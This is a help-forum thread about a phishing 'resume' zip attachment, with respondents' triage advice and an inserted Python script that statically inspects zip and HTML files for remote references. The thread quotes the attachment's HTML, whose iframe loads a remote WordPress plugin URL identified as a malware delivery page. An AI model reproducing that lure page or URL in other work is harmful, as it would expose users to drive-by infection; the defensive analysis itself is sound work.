got the myresume.zip email - what does it do?

Several users have got this email and clicked on it. Can someone tell me what the payload is? I have scanned with several virus/malware scanners and I don't see anything it is doing. I know for a fact the file has a db file in it. Thanks!
Just want to make sure it is clean.
bbimis asked:
*** Hopeleonie *** (IT Manager) commented:
Upload it to https://www.virustotal.com/ and post the result here.
cwstad2 commented:
There is a lot of documented evidence regarding this kind of potential attack, usually a trojan. Is there any content to the mail?

You can also submit to symantec

https://submit.symantec.com/websubmit/retail.cgi

or as above

https://www.virustotal.com/uk/
cwstad2 commented:
I would be very careful. Does it have content similar to this?

    " My name is Bobbie Rocha, attached is my resume.

    I look forward to hearing back from you.

     Thank you,

    Bobbie"

"Subject: My resume

Attached is my resume, let me know if its ok.

Thanks,
Ignacio Oakes

   Resume_LinkedIn.zip (14)"

"Subject: FW: Resume

Attached is my resume, let me know if its ok.

Thanks,
Derick Baldwin

   Resume.zip (11)"
*** Hopeleonie *** (IT Manager) commented:
Zip the whole mail with the attachment, upload it to
http://www.filedropper.com/ and then post the link here for me.

I will analyze it for you. Symantec will take some days to respond. :-)
bbimis (Author) commented:
I can't send it to filedropper.
*** Hopeleonie *** (IT Manager) commented:
You can't upload to filedropper?
Then try http://www.speedyshare.com/
Gabriel Clifton (Net Admin) commented:
One thing you can do, which is good for personal learning, is to build yourself a virtual machine with good A/V and anti-malware programs, copy the file to the VM, disconnect it from the network (completely isolated) and open it, watching what it does. Do some file and registry comparisons before and after.
Ess Kay (Entrepreneur) commented:
Right-click the file and extract it to a temp folder.

Open it in NOTEPAD ONLY
bbimis (Author) commented:
Here is what it contains:


resume3588.html, with contents:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords"
        content="project">

  <meta name="description"
        content="my description">
</head>
<body>
<iframe src="http://newmediava.com/wp-content/plugins/project.php?id=357"  width="829" height="351" align="top"></iframe>

</body>
</html>
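The static triage described above (extract the zip, read the HTML in a text editor rather than a browser, and look at where the iframe points) can be scripted so that nothing in the attachment is ever rendered or executed. The following is an added example written for this page, not code from the original thread. It packs the HTML posted above into an in-memory zip as constructed sample input, lists the members, and statically pulls out iframe/frame/script/object/embed/form and meta-refresh references together with their hostnames. The list of "active" extensions and the "suspicious" verdict rule are this example's own assumptions, and the verdict "no active content found" is deliberately not the same as "clean".

```python
import io
import os
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption of this example: member types that run code or render active
# content when a user double-clicks them. An HTML "resume" is already a red flag.
ACTIVE_EXTS = {".exe", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta",
               ".html", ".htm", ".lnk", ".bat", ".cmd", ".ps1", ".jar"}


class RemoteRefParser(HTMLParser):
    """Collect tags that load or redirect to remote content. Nothing is rendered."""
    WATCH = {"iframe": "src", "frame": "src", "script": "src",
             "object": "data", "embed": "src", "form": "action"}

    def __init__(self):
        super().__init__()
        self.refs = []            # list of (tag, url)
        self.inline_scripts = 0   # <script> blocks with no src attribute

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}   # HTMLParser lowercases tag names
        if tag == "script" and "src" not in a:
            self.inline_scripts += 1
        attr = self.WATCH.get(tag)
        if attr and a.get(attr):
            self.refs.append((tag, a[attr].strip()))
        # <meta http-equiv="refresh" content="0;url=..."> redirects without any script
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            content = a.get("content", "")
            if "url=" in content.lower():
                self.refs.append(("meta-refresh", content.split("=", 1)[1].strip("'\" ")))


def is_remote(url):
    """True for references that cause a network fetch (http(s), ftp or scheme-relative)."""
    return url.startswith("//") or urlparse(url).scheme in ("http", "https", "ftp")


def triage_html(data):
    """Parse HTML bytes and return remote references plus inline-script count."""
    p = RemoteRefParser()
    p.feed(data.decode("utf-8", errors="replace"))
    remote = [(tag, url, urlparse(url, scheme="http").hostname)
              for tag, url in p.refs if is_remote(url)]
    return {"remote_refs": remote, "inline_scripts": p.inline_scripts}


def triage_zip(zip_bytes):
    """List every member and statically inspect HTML members; nothing is executed."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            ext = os.path.splitext(info.filename.lower())[1]
            entry = {"name": info.filename, "size": info.file_size,
                     "active": ext in ACTIVE_EXTS, "remote_refs": [], "inline_scripts": 0}
            if ext in (".html", ".htm"):
                entry.update(triage_html(zf.read(info)))
            findings.append(entry)
    return findings


def verdict(findings):
    """Assumed rule: any active member, remote reference or inline script is suspicious."""
    hit = any(f["active"] or f["remote_refs"] or f["inline_scripts"] for f in findings)
    return "suspicious" if hit else "no active content found"


# Constructed sample input: the HTML the original poster pasted, packed into a zip in memory.
SAMPLE_HTML = b"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta name="keywords" content="project"><meta name="description" content="my description"></head>
<body>
<iframe src="http://newmediava.com/wp-content/plugins/project.php?id=357"  width="829" height="351" align="top"></iframe>
</body>
</html>"""


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("resume3588.html", SAMPLE_HTML)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_zip(build_sample_zip())
    for f in result:
        print(f["name"], f["size"], "ACTIVE" if f["active"] else "", f["remote_refs"])
    print(verdict(result))
```

Run it against a real attachment by replacing build_sample_zip() with the bytes of the .zip file; because the HTML is only parsed, never rendered, the remote host is not contacted and your IP address is not logged, which is the drawback of the "open it in a text browser" approach suggested later in the thread.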
Michael-Best commented:
If it is not from someone you know and trust, then suspect that it is unsafe.
Never open unknown emails with attachments.

Read:
"Email scam warning: "My resume"
 https://help.fredhealth.com.au/blogs/fredofficealerts/archive/2015/03/30/email-scam-warning-quot-my-resume-quot-cryptolocker-style-attack.aspx
Ess Kay (Entrepreneur) commented:
The link takes you to a website run on WordPress with an unknown plugin.

It could be cross-site scripting.

Here is the whois on the owner:
http://whois.domaintools.com/newmediava.com

If you really want to see what's on it, download a text-based browser like Netscape 4.0 and open it.

No scripts will run, but your IP and the link will be logged.

I don't recommend that you EVER open zip files from people you don't know if you are not a security professional. If you are expecting resumes, the best option is to have a website where they fill in fields.

Or ask that they put the text of the resume into the body of the email.


Remember, Microsoft files can contain malicious scripts as macros, and so can AVI, MPEG, MP4, DOC, DOCX, XLS, etc.

Rule of thumb: if it's not warranted mail, it's spam.
*** Hopeleonie *** (IT Manager) commented:
I analysed your file in our lab:
FW ReMy resume.msg/resume3688.html is malware.

Info about the malware:
It is a script virus that is able to infect the system using an HTML script.
*** Hopeleonie *** (IT Manager) commented:
@Gabriel Clifton
    "One thing you can do, which is good for personal learning, is to build yourself a virtual machine with good A/V and anti-malware programs, copy the file to the VM, disconnect it from the network (completely isolated) and open it, watching what it does. Do some file and registry comparisons before and after."

Bad idea! Will not work for most modern malware :-)
bbimis (Author) commented:
Hopeleonie,
any idea what registry entries or anything else it writes, so I can clean the system(s) it has been run on? I currently use the following tools:
jrt
combofix
adwcleaner
super anti spyware
malware bytes rootkit
spyhunter

Thanks! I just want to protect my end users.
*** Hopeleonie *** (IT Manager) commented:
You ran all of them?
bbimis (Author) commented:
Yes, but they didn't see anything related to the myresume.zip, and they didn't even delete the file I had saved, so I assume they didn't detect it. If there are any registry entries made as the payload, please let me know and I can clear them. Thanks!
*** Hopeleonie *** (IT Manager) commented:
Bad :-). Did any scan find anything?

Just running many scans one after another is not proper malware removal. Note also that proper malware removal needs a lot of time, so your patience is asked for. As this is a corporate environment, I strongly recommend reimaging or reinstalling your clients, as nobody can give a 100% guarantee that all malware has been removed.

And never run ComboFix unless told to by a ComboFix expert :-)
Ess Kay (Entrepreneur) commented:
It won't delete the file because the file is not a virus.

It's simply a local web page with an iframe to malware.

When you open it, it just opens the web page (which contains the malware).

The file itself doesn't contain anything harmful, just a link.
Ess Kay (Entrepreneur) commented:
Read your own post where you posted the unzipped file:


 html.... <iframe src=www.malwarewebsite.com/WordPress/malwareplugin>...

bbimis (Author) commented:
Thanks!